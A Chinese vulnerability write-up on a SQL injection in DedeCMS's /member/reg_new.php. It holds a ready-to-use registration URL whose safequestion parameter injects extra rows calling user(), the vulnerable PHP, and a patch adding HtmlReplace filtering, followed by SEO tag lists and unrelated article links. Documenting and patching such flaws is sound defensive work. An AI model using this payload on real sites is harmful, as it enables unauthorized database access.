1. 漏洞描述
Dedecms会员中心注入漏洞
2. 漏洞触发条件
/member/reg_new.php?dopost=regbase&step=1&mtype=%B8%F6%C8%CB&mtype=%B8%F6%C8%CB&userid=123asd123&uname=12asd13123&userpwd=123123&userpwdok=123123&email=1213asd123%40QQ.COM&safequestion=1','1111111111111','1389701121','127.0.0.1','1389701121','127.0.0.1'),('个人',user(),'4297f44b13955235245b2497399d7a93','12as11111111111111111d13123','','10','0','1213asd11111111111123@QQ.COM','100', '0','-10','','1&safeanswer=1111111111111&sex=&vdcode=slum&agree=
//把vdcode=slum改成当前的验证码
3. 漏洞影响范围
4. 漏洞代码分析
/member/reg_new.php
..
$jointime = time();
$logintime = time();
$joinip = GetIP();
$loginip = GetIP();
$pwd = md5($userpwd);
$spaceSta = ($cfg_mb_spacesta < 0 ? $cfg_mb_spacesta : 0);
//未对$mtype、$safeanswer、$safequestion进行有效过滤就带入SQL查询
$inQuery = "INSERT INTO `dede_member` (`mtype` ,`userid` ,`pwd` ,`uname` ,`sex` ,`rank` ,`money` ,`email` ,`scores` ,
`matt`, `spacesta` ,`face`,`safequestion`,`safeanswer` ,`jointime` ,`joinip` ,`logintime` ,`loginip` )
VALUES ('$mtype','$userid','$pwd','$uname','$sex','10','$dfmoney','$email','$dfscores',
'0','$spaceSta','','$safequestion','$safeanswer','$jointime','$joinip','$logintime','$loginip'); ";
if($dsql->ExecuteNoneQuery($inQuery))
..
5. 防御方法
/member/reg_new.php
..
$jointime = time();
$logintime = time();
$joinip = GetIP();
$loginip = GetIP();
$pwd = md5($userpwd);
/* 对$mtype、$safeanswer、$safequestion进行有效过滤 */
$mtype = HtmlReplace($mtype,1);
$safeanswer = HtmlReplace($safeanswer);
$safequestion = HtmlReplace($safequestion);
/* */
$spaceSta = ($cfg_mb_spacesta < 0 ? $cfg_mb_spacesta : 0);
$inQuery = "INSERT INTO `dede_member` (`mtype` ,`userid` ,`pwd` ,`uname` ,`sex` ,`rank` ,`money` ,`email` ,`scores` ,
`matt`, `spacesta` ,`face`,`safequestion`,`safeanswer` ,`jointime` ,`joinip` ,`logintime` ,`loginip` )
VALUES ('$mtype','$userid','$pwd','$uname','$sex','10','$dfmoney','$email','$dfscores',
'0','$spaceSta','','$safequestion','$safeanswer','$jointime','$joinip','$logintime','$loginip'); ";
if($dsql->ExecuteNoneQuery($inQuery))
{
..
红色部分是添加的代码
# 企业在线品牌营销推广
# style
# img
# 大学信息网站建设教程
# 康平媒体网站建设价位
# 平台图标推广营销方案
# 淡水茶叶网站推广
# 正规seo优化管理系统
# 网站建设有哪些特征呢
# 孝感百度seo技巧
# 德安一站式网站建设商家
# 从江县营销推广报价
# text
# 辽宁推广网站建设介绍
# 2025*新seo
# 罗湖在线网站优化经验
# 长子营网站建设
# b站推广网站mmm明星
# 制订茶叶营销推广策划书
# seo培训学院官网教育
# 关键词排名用什么决定的
# seo排名seo排名
# 砂锅店营销推广方案怎么写
# userpwd
# new.php SQL注入漏洞修复
# 织梦CMS教程
# 织梦漏洞
# SQL注入漏洞
# 验证码
# 未对
# uname
# mtype
# userid
# CB
# 织梦member/reg
# safequestion
# email
# userpwdok
# QQ
# space
# public
# src
# hongkong
# cn
# oss
相关文章:
惠大麦如何应用图片SEO?_SEO优化教程
如何考察南京SEO公司的口碑?_SEO优化教程
为什么在网站建设前需要网站策略?
古驰网站移动端按钮设计应遵循哪些原则减少误触问题_网站建设教程
北京网站建设与维护服务公司_北京网站建设与维护服务平台_网站建设工作
一般网站建设公司有哪些_一般网站建设公司_便宜网站建设模板网站
拍卖网站建设方案_拍卖网站建设_济宁网站建设工程施工
北京外贸网站建设公司_北京外贸网站建设方案_智能网站seo
页面SEO的主要内容有哪些_SEO优化教程
企业网站设计如何避免兼容性问题_网站建设教程
佛山网站建设公司_佛山网站建设制作_单县整合营销推广中心
建公司网站的详细步骤_建公司网站一般多少钱_中证网seo方案
【怎样自己做一个网站】自己制作了网站,百度怎么能搜索呢?如何在网上建立交友网站?如何为自己建立IP地址?
法律网站设计案例_法律网站设计方案_专业建设网站的企业
品牌网站建设解决方案_品牌网站建设哪家好_全网营销推广收费低
北京营销型网站建设公司有哪些_北京营销型网站建设公司_山东矩阵seo公司排名
高端网站建设公司哪家好一点_高端网站建设公司排行_鲁权屯网站建设
上海SEO优化公司如何通过数据分析提升效果?_SEO优化教程
苏州企业网站模板建站_苏州企业网站建设_抖音关键词排名价格多少
搭建网站时如何选择适合的虚拟主机或独立服务器_网站建设教程
网站建设商家怎么做_网站建设商家_佛山服务类网站建设费用
惠城SEO优化中哪些因素会影响网站的排名?_SEO优化教程
网站建设的网络公司_企业网站建设公司_道家学术网站建设
大连开发区网站建设公司_大连开发区网站建设项目_怎么提升seo排名
企业网站建设开发公司哪家好_企业网站建设开发公司有哪些_金华市网站优化排名
如何利用SEO优化提升网站客户吸引力_网站建设教程
电商网站建设公司的设计流程包含哪些步骤_网站建设教程
制作一个网页的工作流程_制作一个网页的步骤_制作一个网页
重庆彭水网站建设_延安网站优化怎么样
景区网站建设方案费用_景区网站建设_增城新塘网站制作推广
网站建设时常见的几种模式
如何评估和调整青岛SEO效果_SEO优化教程
崇左哪些平台提供电商网站建设功能_网站建设教程
公司建设网站公司有哪些_公司建设网站流程_枣庄网络营销平台推广
网站建设如何优化站内新闻?
成都网站建设公司哪个好_成都网站建设公司排行_移动互联网网站建设
注册免费个人网站_注册免费二级域名_注册界面模板
手机网站应当如何做推广呢?网站建设包括什么?
成都机械网站建设注意什么?
滁州口碑好的网站开发公司有哪些值得推荐_网站建设教程
河北网站建设开发公司排名_河北网站建设开发_宁德推广营销找哪家
网站建设需要多少钱,看客户需求的功能决定?
公司建设网站制作_哪里有网站推广咨询
网站建设推广效果不好的主要原因
深圳生产型企业网站建设专业有哪些_深圳生产型企业网站建设专业_seo设置参数
为什么要开发手机网站?手机网站制作难吗?
自己建设企业网站_中宁商城网站建设方案
企业网站建设公司哪家好_企业网站建设公司有哪些_seo优化方案怎么做
网站建设多少钱一个平台_网站建设多少钱一个_营销是推广传播吗举例
如何确保英文网站设计符合国际用户习惯_网站建设教程
相关栏目:
【
网络营销44070 】
【
网络推广122852 】
【
网络优化116010 】
【
网址导航102054 】
【
网络技术82194 】
【
网络资讯43554 】